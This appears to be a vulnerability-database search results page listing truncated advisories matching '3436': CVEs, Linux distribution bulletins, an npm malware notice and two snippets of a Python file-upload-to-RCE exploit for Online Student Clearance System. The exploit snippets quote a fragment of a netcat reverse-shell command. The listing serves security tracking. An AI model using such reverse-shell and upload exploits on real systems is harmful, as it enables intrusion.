82 matches found
@squawk/mcp (>=0.2.0 <=0.9.0) potentially affected by unknown CVE via @squawk/airports (>=0.3.2 <=0.6.1)
@squawk/airports NPM version =0.3.2, =0.2.0, =0.9.0 Source cves: unknown CVE Source advisory: OSV:MAL-2026-3436...
EUVD-2026-3436
IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information from allocated memory due to improper clearing of heap memory...
EUVD-2019-3436
Malware in sbrugna...
CVE-2022-3436
A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack can be launche...
CVE-2025-3436
creationtimestamp | type | source
---|---|---
2025-04-08 08:46:44+00:00 | seen | https://t.me/DarkWebInformerCVEAlerts/10882
2025-04-08 13:59:44+00:00 | seen | https://t.me/cvedetector/22438
...
GLSA-202409-25 : Xpdf: Multiple Vulnerabilities
The remote host is affected by the vulnerability described in GLSA-202409-25 Xpdf: Multiple Vulnerabilities Multiple vulnerabilities have been discovered in Xpdf. Please review the CVE identifiers referenced below for details. Tenable has extracted the preceding description block directly from th...
CGA-39P2-3436-J283
Bulletin has no description...
CVE-2024-3436
A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /Admin/edit-photo.php of the component Avatar Handler. The manipulation of the argument avatar leads to unrestricted upload. The attack c...
Slackware: Security Advisory (SSA:2024-040-01)
The remote host is missing an update for the...
Mageia: Security Advisory (MGASA-2024-0035)
The remote host is missing an update for the...
Online Student Clearance System 1.0 Shell Upload Exploit
!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...
Online Student Clearance System 1.0 Shell Upload
!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...
Oracle Linux 8 : httpd:2.4 (ELSA-2019-3436)
The remote Oracle Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2019-3436 advisory. - In Apache HTTP Server 2.4 release 2.4.38 and prior, a race condition in mod_auth_digest when running in a threaded server could allow a user with valid...
CVE-2023-3436
creationtimestamp | type | source
---|---|---
2023-06-28 00:12:16+00:00 | seen | https://t.me/cibsecurity/65589
...
CVE-2023-3436
Xpdf 4.04 will deadlock on a PDF object stream whose "Length" field is itself in another object stream...
CVE-2023-3436
CVE-2023-3436 affects Xpdf 4.04 where a PDF object stream’s Length field, if placed in another object stream, can cause a deadlock. Public sources (Slackware/Mageia advisories) recommend upgrading to Xpdf 4.05 or newer to fix the issue, with related entries noting other CVEs in the same release. ...
CVE-2023-3436 Deadlock in Xpdf 4.04 due to PDF object stream references
Xpdf 4.04 will deadlock on a PDF object stream whose "Length" field is itself in another object stream...
RHEL 8 : kpatch-patch (RHSA-2021:3436)
The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2021:3436 advisory. This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Security Fixe...
SUSE CVE-2012-3436
OpenTTD 0.6.0 through 1.2.1 does not properly validate requests to clear a water tile, which allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a certain sequence of steps related to "the water/coast aspect of tiles which also have railtracks on one...
CVE-2022-3436 SourceCodester Web-Based Student Clearance System Photo edit-photo.php unrestricted upload
A vulnerability classified as critical was found in SourceCodester Web-Based Student Clearance System 1.0. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Photo Handler. The manipulation leads to unrestricted upload. The attack can be launche...